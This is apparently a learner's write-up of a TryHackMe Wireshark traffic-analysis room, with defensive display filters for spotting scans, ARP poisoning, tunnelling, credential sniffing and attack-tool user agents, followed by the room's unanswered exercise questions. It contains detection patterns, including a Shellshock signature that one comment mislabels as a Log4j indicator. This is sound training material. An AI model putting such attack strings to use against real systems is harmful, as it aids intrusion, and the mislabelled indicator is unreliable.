We covered the second part of Wireshark tutorials where we went over traffic analysis using advanced filters. We analyzed network traffic with different protocols such as HTTP and DNS. We also covered analyzing NMAP scans, ARP Poisoning attacks and SSH tunneling. Additionally, we explained how to extract clear-text credentials passed over insecure protocols such as HTTP & FTP. This was part of TryHackMe Wireshark Traffic Analysis SOC Level 1.
Detecting Nmap Scans
One of the first things I tackled was detecting Nmap scans. I discovered how to identify TCP connect scans by filtering for specific TCP flags (SYN=1, ACK=0) and a particular window size. I also learned to determine the exact scan type used for a port by observing the packet flow—a SYN, SYN-ACK, ACK sequence, for instance, clearly indicates a TCP connect scan. For UDP scans, I found that I could count closed port messages by filtering for specific ICMP type and code (type 3, code 3), as UDP scans often trigger these. To pinpoint open UDP ports within a range, I learned to exclude closed ports using a “not equal” filter for ICMP type/code and then filter specifically for UDP.
Analyzing ARP for Poisoning and MITM Attacks
Next, I moved on to ARP packets to look for poisoning and Man-in-the-Middle (MITM) attacks. I learned to spot ARP requests crafted by an attacker and how to extract the attacker’s MAC address from these packets. I could even count the number of ARP requests sent by the attacker using their MAC address and ARP opcode 1. Crucially, I figured out how to filter HTTP packets that the attacker received by using their MAC address as the destination. This allowed me to extract sniffed usernames and passwords from HTTP POST requests by filtering for the specific host and request method.
Diving into DHCP, NetBIOS, and Kerberos Traffic
I also explored analyzing DHCP, NetBIOS, and Kerberos traffic with the goal of extracting identifying information like hostnames, MAC addresses, IP addresses, and usernames. I practiced filtering for NetBIOS (NBNS) registration requests using the NBNS flags opcode (5) and searching for specific hostnames within the NBNS name attribute. I found out how to identify which host requested a specific IP address by filtering DHCP packets for the “requested IP address” option and then examining the hostname option. Lastly, I learned to find a user’s IP address by filtering Kerberos packets for a CName string containing the username and then checking the source/destination IP. I could also list hostnames from Kerberos packets by simply filtering for the CName string.
Uncovering DNS and ICMP Tunneling/Exfiltration
The video then moved to more advanced topics like DNS and ICMP tunneling/exfiltration. I learned to identify anomalous ICMP packets by filtering for data lengths greater than a standard size (e.g., 64 bytes), which can often indicate tunneling. I could even detect the protocol used in ICMP tunneling (like OpenSSH) by examining the payload data of these unusual packets. For DNS, I discovered how to find malicious DNS queries by filtering for DNS query name lengths greater than a certain value (e.g., 15), as command and control (C2) communications often use longer, encoded domain names. This helped me pinpoint suspicious domain addresses receiving these anomalous queries.
Extracting Clear Text Credentials and Analyzing HTTP User Agents
A critical skill I picked up was extracting clear text credentials from FTP and HTTP. I learned to filter for FTP brute-force attempts by looking for a specific FTP response code (530 for failed login). I could also determine the size of a file accessed via FTP and identify uploaded file names by following the FTP stream and looking for upload commands. I even saw how to detect attempts to change file permissions by looking for commands like CHMOD in the FTP stream.
For HTTP, I investigated anomalous HTTP user agents that might signal malicious tools (like SQLMap, Nmap, Wfuzz, Nikto) or even user agents indicating Log4j attacks or Base64 encoded commands. The video also highlighted how attackers might use typos in user agents (e.g., “Mosailla” instead of “Mozilla”) to try and deceive analysts.
Decrypting HTTPS Packets
One of the most valuable lessons was about decrypting HTTPS packets. I understood that HTTPS traffic is encrypted, and to gain full visibility, I need decryption keys. I learned to use TLS handshake types (type 1 for client hello, type 2 for server hello) to filter client-server communication over HTTPS. The video then showed me how to supply Wireshark with a pre-shared key log file to decrypt HTTPS traffic, allowing me to view it in clear text (e.g., as HTTP/2) and extract information like the “authority” header or even export objects from the decrypted traffic.
Automatically Extracting Credentials and Creating Firewall Rules
Finally, I discovered some incredibly useful built-in features. Wireshark has a “Tools > Credentials” feature that can automatically list clear text credentials from protocols like FTP and HTTP—a huge time-saver! And to top it off, I learned that Wireshark can even generate firewall rules (for systems like Netfilter, Cisco IOS, IPFilter) based on the captured traffic, showing me how to create rules for denying source IPs or allowing destination MAC addresses.
Key Wireshark Display Filters I Used:
The video primarily focused on Wireshark’s powerful display filters. Here are some of the key filters I learned to use:
- Nmap Scan Detection:
tcp.flags.syn == 1 && tcp.flags.ack == 0 && tcp.window_size > 1024tcp.port == 80icmp.type == 3 && icmp.code == 3udp && !(icmp.type == 3 && icmp.code == 3)(for open UDP ports)
- ARP Poisoning/MITM:
eth.src == 00:0c:29:XX:XX:XX && arp.opcode == 1(to count attacker’s ARP requests)eth.dst == 00:0c:29:XX:XX:XX && http(to filter HTTP traffic received by the attacker)http.host == "example.com" && http.request.method == "POST"(to find credentials)
- DHCP, NetBIOS, Kerberos:
dhcpnbns.flags.opcode == 5 && nbns.name contains "HOSTNAME"dhcp.option.requested_ip_address == 192.168.1.100kerberos.CNameString contains "u5"kerberos.CNameString(to list hostnames)
- DNS/ICMP Tunneling:
icmp && data.len > 64dns.qry.name.len > 15
- Clear Text Credentials (FTP/HTTP):
ftp.response.code == 530(for failed FTP logins)ftp.response.code == 213(for FTP file status)http.user_agent == "sqlmap" || http.user_agent == "nmap" || http.user_agent == "wfuzz" || http.user_agent == "nikto"(for malicious user agents)http.user_agent contains "() { :;};"(for Shellshock/Log4j indicators)http.user_agent contains "Mosailla"(for user agent typos)
- HTTPS Decryption:
tls.handshake.type == 1(client hello)tls.handshake.type == 2(server hello)http2(for decrypted HTTP/2 traffic)
Room Answers
Use the “Desktop/exercise-pcaps/arp/Exercise.pcapng” file.
What is the number of ARP requests crafted by the attacker?
What is the number of HTTP packets received by the attacker?
What is the number of sniffed username&password entries?
What is the password of the “Client986”?
What is the comment provided by the “Client354”?
Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap” file.
What is the MAC address of the host “Galaxy A30”?
How many NetBIOS registration requests does the “LIVALJM” workstation have?
Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap” file.
What is the IP address of the user “u5”? (Enter the address in defanged format.)
Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?
Use the “Desktop/exercise-pcaps/dns-icmp/dns.pcap” file.
Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)
Use the “Desktop/exercise-pcaps/ftp/ftp.pcap” file.
How many incorrect login attempts are there?
What is the size of the file accessed by the “ftp” account?
The adversary uploaded a document to the FTP server. What is the filename?
The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?
Investigate the user agents. What is the number of anomalous “user-agent” types?
What is the packet number with a subtle spelling difference in the user agent field?
Use the “Desktop/exercise-pcaps/http/http.pcapng” file.
Locate the “Log4j” attack starting phase. What is the packet number?
Locate the “Log4j” attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude “{}”.)
What is the frame number of the “Client Hello” message sent to “accounts.google.com”?
Decrypt the traffic with the “KeysLogFile.txt” file. What is the number of HTTP2 packets?
Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)
Investigate the decrypted packets and find the flag! What is the flag?
What is the packet number where “empty password” was submitted?
Select packet number 231. Create “IPFirewall” rules. What is the rule for “allowing destination MAC address”?
